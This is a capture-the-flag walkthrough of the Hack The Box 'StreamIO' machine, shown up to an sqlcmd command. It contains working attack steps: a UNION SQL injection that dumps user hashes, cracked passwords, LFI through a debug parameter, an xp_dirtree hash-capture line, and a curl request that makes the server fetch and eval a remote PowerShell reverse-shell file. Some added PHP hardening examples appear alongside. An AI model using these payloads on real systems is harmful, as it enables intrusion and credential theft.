
# HTB - StreamIO

## Machine Info

StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection used to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code of the administration pages and leads to a remote file inclusion vulnerability; abusing it gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used for lateral movement. As the secondary user we find that the Firefox profile contains a database from which saved credentials can be extracted. Using the new credentials with BloodHound we discover that the user has the ability to add themselves to a specific group whose members can read LDAP secrets. Without direct access to the account, we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then query LDAP to disclose the administrator LAPS password.

## Enumeration

***

**Scope**

> IP Address: 10.10.11.158

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p53,80,88,135,139,389,443,445,464,593,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-09 09:09:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
|_ssl-date: 2024-07-09T09:10:11+00:00; +7h00m03s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-09T09:09:33
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
```

```
* Open ports: 53,80,88,135,139,389,443,445,464,593,3268,3269,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - RPC - SMB - KERBEROS - LDAP - winRM
* Versions: IIS httpd 10.0
* Important Notes: Domain: streamIO.htb - DNS:watch.streamIO.htb
```

Before I start the enumeration process, I will update `/etc/hosts` with the info from the Nmap script output.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo sh -c "echo  '$ip streamIO.htb watch.streamIO.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ tail -n1 /etc/hosts
10.10.11.158 streamIO.htb watch.streamIO.htb
```

**DNS Enumeration**

I tried a zone transfer, but it failed.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ dig axfr streamIO.htb @$ip

; <<>> DiG 9.19.19-1-Debian <<>> axfr streamIO.htb @10.10.11.158
;; global options: +cmd
; Transfer failed.
```

**RPC & SMB Enumeration**

I got access denied when enumerating both services.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbclient -N -L //$ip                                                 
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u ''  -p '' --shares

SMB     10.10.11.158    445    DC    [-] streamIO.htb\: STATUS_ACCESS_DENIED 
```

**KERBEROS Enumeration**

Then I attempted username enumeration looking for a possible way in, but nothing was found here either.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list /usr/share/wordlists/seclists/Usernames/jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/08 22:27:10 >  Done! Tested 48705 usernames (0 valid) in 57.952 seconds
```

**HTTP & HTTPS enumeration**

`http://10.10.11.158`

<figure><img src="/files/B6uhbuxw3F03HrtSBea7" alt=""><figcaption></figcaption></figure>

`https://10.10.11.158`

<figure><img src="/files/V7yv6zwMJiZj1h4lDwHe" alt=""><figcaption></figcaption></figure>

I tried fuzzing subdomains over `http` and found nothing; however, when I tried subdomain fuzzing against the `https` protocol, I got a hit.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

<snip>
:: Progress: [19966/19966] :: Job [1/1] :: 444 req/sec :: Duration: [0:01:00] :: Errors: 0 ::
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200 -k

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

<snip>
watch     [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 1478ms]
```

`https://watch.streamIO.htb`

<figure><img src="/files/tBTFPBtmJKk5kVkDejBD" alt=""><figcaption></figcaption></figure>

I looked at `Wappalyzer` to see which technologies are in use, and `PHP` caught my attention since it is uncommon to run `php` on `IIS`. So I attempted directory fuzzing against `https://watch.streamIO.htb`.

<figure><img src="/files/MKhmQFgwbeBWVLEH3EQc" alt=""><figcaption></figcaption></figure>

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://watch.streamIO.htb/FUZZ -k -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

index.php     [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 2171ms]
search.php    [Status: 200, Size: 253887, Words: 1, Lines: 1, Duration: 3382ms]
Index.php     [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 867ms]
```

I also fuzzed for php files on `https://streamIO.htb`.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev

index.php    [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 366ms]
login.php    [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 479ms]
logout.php   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 470ms]
about.php    [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 786ms]
register.php [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 841ms]
contact.php  [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 1200ms]
```

`https://streamIO.htb/login.php`

<figure><img src="/files/RX5I8CckmT9rDVO1r7hH" alt=""><figcaption></figcaption></figure>

I don't have any credentials yet, so I will come back to this page once I obtain some.

`https://watch.streamIO.htb/search.php`

<figure><img src="/files/uvCcpl5xuyCtyVYhA9Z1" alt=""><figcaption></figcaption></figure>

It's a search function that looks up a film name in a specific table, which suggests a database backend, so we can attempt SQL injection.

When I delivered a simple payload, I got blocked by some security defence in place.

<figure><img src="/files/8eGxSblOJaJS35a9SjKM" alt=""><figcaption></figcaption></figure>

`blocked.php`

<figure><img src="/files/OFwhbLMjdiuhpyLmST4L" alt=""><figcaption></figcaption></figure>

So, I can't use `SQLMap` and I will continue manually.

Something interesting caught my attention here: when I typed a word like `man`, it was matched from both sides.

<figure><img src="/files/DkAt9QtcHO6YitgXyFC5" alt=""><figcaption></figcaption></figure>

It returns `Batman` and `Anger Management`, so the query uses a wildcard on both sides of the input, such as `*Search*`.

The SQL command is probably something like this:

```sql
SELECT * FROM movies WHERE Film_name = '*input*'
```

I can break out of the query with something like `input';--`:

```sql
SELECT * FROM movies WHERE Film_name = '*input';-- *'
```

I was right: when I typed `man';--`, it only matched the wildcard on the right side, as we had already escaped the left side.

<figure><img src="/files/vlutcBfiSGQMFZANCD1H" alt=""><figcaption></figcaption></figure>

Let's create our exploit. I tried `union 1,2,...` with an increasing number of columns until I got a hit at `union 1,2,3,4,5,6`:

```sql
SELECT * FROM movies WHERE Film_name = '*anything' union select 1,2,3,4,5,6 -- *'
```

<figure><img src="/files/5gSdLCkJFdG86cZvBssW" alt=""><figcaption></figcaption></figure>

Field `2` is reflected in the output, so I will inject my queries into it.
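As an added example (not the site's own code), here is the pattern the search behaviour above implies, written in PHP beside a parameterised replacement. The connection handle, table name and column names are assumptions for illustration. The hardened version binds the pattern as a `sqlsrv_query` parameter and escapes LIKE's own metacharacters, so input like `man';--` is searched for literally; a front-end filter such as the `blocked.php` page seen earlier then becomes a secondary control rather than the only one.

```php
<?php
// Added example, not StreamIO's code. $handle, the movies table and its
// columns are assumptions used for illustration.

// VULNERABLE: user input is concatenated into the LIKE pattern.
// A query string such as  man';--  closes the literal and comments out
// the rest of the statement, which is what the writeup exploits above.
function search_movies_vulnerable($handle, string $q): array
{
    $sql = "SELECT id, name FROM movies WHERE name LIKE '%" . $q . "%'";
    return fetch_all($handle, $sql, []);
}

// HARDENED: the pattern is passed as a bound parameter, so it can never
// change the structure of the statement. The wildcards are added in PHP,
// and LIKE's metacharacters (% _ [) are escaped so a user cannot widen
// the match to the whole table. '[' is escaped first so the brackets
// introduced by the later replacements are not escaped twice.
function search_movies_safe($handle, string $q): array
{
    $escaped = str_replace(['[', '%', '_'], ['[[]', '[%]', '[_]'], $q);
    $sql = "SELECT id, name FROM movies WHERE name LIKE ?";
    return fetch_all($handle, $sql, ['%' . $escaped . '%']);
}

// Run a statement with optional bound parameters and collect the rows.
function fetch_all($handle, string $sql, array $params): array
{
    $stmt = sqlsrv_query($handle, $sql, $params);
    if ($stmt === false) {
        throw new RuntimeException(print_r(sqlsrv_errors(), true));
    }
    $rows = [];
    while ($row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC)) {
        $rows[] = $row;
    }
    sqlsrv_free_stmt($stmt);
    return $rows;
}

// Usage (connection details are placeholders):
// $handle = sqlsrv_connect('(local)', ['Database' => 'STREAMIO', 'UID' => 'app', 'PWD' => '...']);
// print_r(search_movies_safe($handle, $_POST['q'] ?? ''));
```

Binding sends the pattern separately from the query text, which removes the injection; escaping `%`, `_` and `[` addresses the LIKE-specific problem that binding alone does not, namely a user turning the search into a wildcard match over every row.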

<figure><img src="/files/BlOOYMyArZsN1aUsWn8j" alt=""><figcaption></figcaption></figure>

So, we're dealing with an `MSSQL` database; we can use commands from this cheat sheet:

{% embed url="<https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet>" %}

Get the user name:

<figure><img src="/files/suIp2W39rvVzQuvKB2FN" alt=""><figcaption></figcaption></figure>

Current Database:

<figure><img src="/files/MrczCDGnsPKKpa5opl87" alt=""><figcaption></figcaption></figure>

Since we're on an MSSQL database, one common attack vector is to capture the hash of the account running the service by making it authenticate to our host with the following command. I tried it, but it failed: I got the machine account hash, which couldn't be cracked.

```sql
anything' EXEC master..xp_dirtree '\\10.10.16.3\share\';--
```

Continue to explore the database

<figure><img src="/files/Np4NnUzFgZkVGe7j0Heg" alt=""><figcaption></figcaption></figure>

We're already in `STREAMIO`, so let's explore the tables.

<figure><img src="/files/XYF6ZZQMQNYYinkGXzMz" alt=""><figcaption></figcaption></figure>

When I provided an asterisk `*` it didn't return anything, but when I provided `username` it returned a list of usernames.

<figure><img src="/files/OJASRZcSglrCaxUNz30S" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fzzUeJyT7mwCUQMrXrgp" alt=""><figcaption></figcaption></figure>

When I provided `password`, it returned a list of hashes, but copying and pasting them one by one would be a waste of time.

<figure><img src="/files/Z4UpdwckKMWjfZytodGI" alt=""><figcaption></figcaption></figure>

I looked at Burp to see which HTML tag the hashes are wrapped in.

<figure><img src="/files/33ldWruIa6uAaokK3ufH" alt=""><figcaption></figcaption></figure>

So, I will use `curl` to get the list of hashes and filter the results.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,password,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a hashes.txt

<snip>
0049ac57646627b8d7aeaccf8b6a936f
08344b85b329d7efd611b7a7743e8a09
083ffae904143c4796e464dac33c1f7d
0cfaaaafb559f081df2befbe66686de0
<snip>
```

I will do the same thing with `usernames`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,username,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a users.txt

<snip>
Theodore
Victor
Victoria
William
yoshihide
```

## Initial Access

***

The username list is too big for brute forcing, so I will try to find out who really has an account on the machine by enumerating `Kerberos`.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d streamIO.htb -t 100 -o users.list ./users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/09 00:35:59 >  [+] VALID USERNAME:       yoshihide@streamIO.htb
```

I now have a user list and a hash list. Let's attempt to crack the hashes and then try brute forcing.

First, start `hashcat` in auto-detection mode to learn the type of hash.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  hashes.txt /usr/share/wordlists/rockyou.txt

<snip>
  ======+============================================================+===================
    900 | MD4                                                        | Raw Hash
      0 | MD5                                                        | Raw Hash
     70 | md5(utf16le($pass))                                        | Raw Hash
   2600 | md5(md5($pass))                                            | Raw Hash salted and/or iterated
   3500 | md5(md5(md5($pass)))                                       | Raw Hash salted and/or iterated
   4400 | md5(sha1($pass))                                           | Raw Hash salted and/or iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))                    | Raw Hash salted and/or iterated
   4300 | md5(strtoupper(md5($pass)))                                | Raw Hash salted and/or iterated
   1000 | NTLM                                                       | Operating System
   9900 | Radmin2                                                    | Operating System
   8600 | Lotus Notes/Domino 5                                       | Enterprise Application Software (EAS)
```

Not all the hashes were cracked, but we will be fine with what we found.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

<snip>
Session..........: hashcat
Status...........: Exhausted

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
3577c47eb1e12c8ba021611e1280753c:highschoolmusical
54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
665a50ac9eaa781e4f7f04199db97a11:paddpadd
6dcd87740abb64edfa36d170f0d5450d:$3xybitch
b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
ef8f3d30a856cf166fb8215aca93e9ff:%$clara
f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
```

Creating a password list for brute forcing

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show | cut -d: -f2 | tee -a pass.lst

<snip>
highschoolmusical
$hadoW
paddpadd
<snip>
```

Unfortunately, I didn't get a hit when I tried brute forcing

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u yoshihide -p pass.lst

SMB         10.10.11.158    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:##123a8j8w5123## STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:$monique$1991$ STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:highschoolmusical STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:$hadoW STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:paddpadd STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:$3xybitch STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:!5psycho8! STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:66boysandgirls.. STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:!?Love?!123 STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:physics69i STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:%$clara STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:!!sabrina$ STATUS_LOGON_FAILURE   
```

I remember the `login.php` page that I left behind as I didn't have any credentials.

Intercept the login request, send it to `Intruder`, and start the attack with the passwords we have.

<figure><img src="/files/66Dia6W9Ilox9SOc2U7g" alt=""><figcaption></figcaption></figure>

Fuzzing for the `/admin` directory and parameters

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

images     [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 694ms]
admin      [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 1498ms] 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/admin/FUZZ -t 200 -k

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       


index.php      [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 901ms]
master.php     [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 617ms]
```

`https://streamio.htb/admin/master.php`

<figure><img src="/files/yUDdpLvylFWpEjpn59TU" alt=""><figcaption></figcaption></figure>

There seems to be a missing parameter, so let's try parameter fuzzing.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u https://streamIO.htb/admin/?FUZZ= -t 200 -k -fs 1678 -H "Cookie: PHPSESSID=nnt2pl59ell9hqjdvu82ugegpf"

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

debug      [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 987ms]
movie      [Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 596ms]
user       [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 1524ms]
staff      [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 8876ms]
```

`https://streamio.htb/admin/?debug=`

<figure><img src="/files/7GVazaiV00u1RqSDdA69" alt=""><figcaption></figcaption></figure>

I tried `LFI` in this parameter and I got a hit `https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts`

<figure><img src="/files/CWxevGeeVGt0CgBlF0p5" alt=""><figcaption></figcaption></figure>

I will use this vulnerability to read the content of `master.php` using a PHP wrapper.

<figure><img src="/files/HFembLxJpPK0zz2ELC2x" alt=""><figcaption></figcaption></figure>

### **Shell as yoshihide**

```bash
echo "onlyPGgxPk1vdmllIG1hbmFnbW......." | base64 -d | tee -a master.php
```

The file checks that it is being included (the `included` constant must be defined) and dies otherwise.

```bash
cat master.php

<?php
if(!defined('included'))
        die("Only accessable through includes"); 

<snip>
```

Looking at the end of the code, it takes input from the `include` parameter of a POST request.

```php
<?php
if (isset($_POST['include']))
{
    if ($_POST['include'] !== "index.php")
        eval(file_get_contents($_POST['include']));
    else
        echo(" ---- ERROR ---- ");
}
?>
```

I will include `master.php` via `https://streamio.htb/admin/?debug=` and add the `include` parameter to the POST request to meet the conditions.

We found `LFI` before, but `RFI` didn't work on the `debug=` parameter, so I will try `RFI` on the `include` parameter.
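As an added example (not from the StreamIO application), here is how the two inclusion patterns above can be hardened in PHP: the `debug` parameter is resolved only against an allowlist inside a fixed directory, and the POST `include` action is dispatched to server-side code instead of being fetched with `file_get_contents()` and passed to `eval()`. The `pages` directory, the page names and the action table are assumptions for illustration.

```php
<?php
// Added example, not StreamIO's code. The pages directory, allowlist
// entries and action names below are assumptions for illustration.

define('included', true);

// `debug` previously accepted an arbitrary path (LFI, and php:// wrappers).
// Resolve it against one fixed directory and refuse anything that is not on
// the allowlist or that escapes that directory.
function safe_debug_include(string $requested): void
{
    $base    = realpath(__DIR__ . '/pages');
    $allowed = ['master.php', 'staff.php', 'user.php'];

    $name = basename($requested);           // drop any directory component
    if ($base === false || !in_array($name, $allowed, true)) {
        http_response_code(400);
        exit('unknown page');
    }

    // realpath() collapses ../ and returns false for missing files, so the
    // prefix check cannot be bypassed by traversal or symlink tricks.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(400);
        exit('unknown page');
    }
    include $path;
}

// `include` previously fetched whatever the client named and eval()'d it.
// Map the parameter to code that already lives on the server; no
// user-controlled string is ever opened or executed.
function handle_include_action(string $action): void
{
    $actions = [
        'movies' => function (): void { echo 'movie management'; },
        'users'  => function (): void { echo 'user management'; },
    ];
    if (!isset($actions[$action])) {
        echo ' ---- ERROR ---- ';
        return;
    }
    $actions[$action]();
}

if (isset($_GET['debug'])) {
    safe_debug_include((string) $_GET['debug']);
}
if (isset($_POST['include'])) {
    handle_include_action((string) $_POST['include']);
}
```

Note that `allow_url_include=Off` would not have helped here, because `file_get_contents()` is governed by `allow_url_fopen`; turning that off blocks the remote fetch but still leaves `eval()` of any local file reachable through the LFI. Removing the `eval()` of user-supplied content is the actual fix, and the allowlist removes the LFI that made the source readable in the first place.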

<figure><img src="/files/keUOp970L7f32SqALGlo" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/U17fD8uqNBI8gWUe06P0" alt=""><figcaption></figcaption></figure>

We got a hit. Let's create a webshell.

```php
// Contents of shell.php: fetched by file_get_contents() and passed straight to eval(),
// so no opening <?php tag is needed. <base64> is the encoded PowerShell reverse-shell command.
system("PowerShell -c powershell -e <base64>");
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -XPOST https://streamio.htb/admin/?debug=master.php -d "include=http://10.10.16.3/shell.php" -H "Cookie: PHPSESSID=nujp4k6q68sd43p4jc439fuepo" -k
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rlwrap nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.158] 59891

PS C:\inetpub\streamio.htb\admin> 
```

I looked around, found `login.php` and decided to explore its content

```powershell
PS C:\inetpub\streamio.htb> dir

    Directory: C:\inetpub\streamio.htb

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:49 AM                admin
d-----        2/22/2022   2:49 AM                css
d-----        2/22/2022   2:49 AM                fonts
d-----        2/22/2022   2:49 AM                images
d-----        2/22/2022   3:19 AM                js
-a----        2/23/2022   2:16 AM           4341 about.php
-a----        2/23/2022   2:16 AM           1357 about_include.php
-a----        2/23/2022   2:16 AM           2908 contact.php
-a----        2/23/2022   2:16 AM           1706 contact_include.php
-a----        7/30/2021   1:57 AM           1150 favicon.ico
-a----        2/22/2022   3:21 AM           1812 header_include.php
-a----        2/25/2022  11:57 PM           7337 index.php
-a----        2/23/2022   2:16 AM           2415 info_include.php
-a----        2/26/2022   8:27 AM           3938 login.php
-a----        2/23/2022   2:16 AM            216 logout.php
-a----        2/25/2022  11:42 PM           4480 register.php

PS C:\inetpub\streamio.htb> type login.php

<snip>

<?php
$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
function bad_char_check($name
```

I searched for other passwords that may exist and found one.

```powershell
PS C:\inetpub\streamio.htb> ls -Force | select-string -pattern "PWD"

login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81:    $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
```

These are passwords for the `MSSQL` database:

```
db_user:'B1@hB1@hB1@h'
db_admin:'B1@hx31234567890'
```

### **Shell as nikk37**

Let's examine the `db` with the `SQLCMD` tool.

```powershell
PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_user -P 'B1@hB1@hB1@h' -Q "select @@version"

----------------------------------------------------------------------------------------
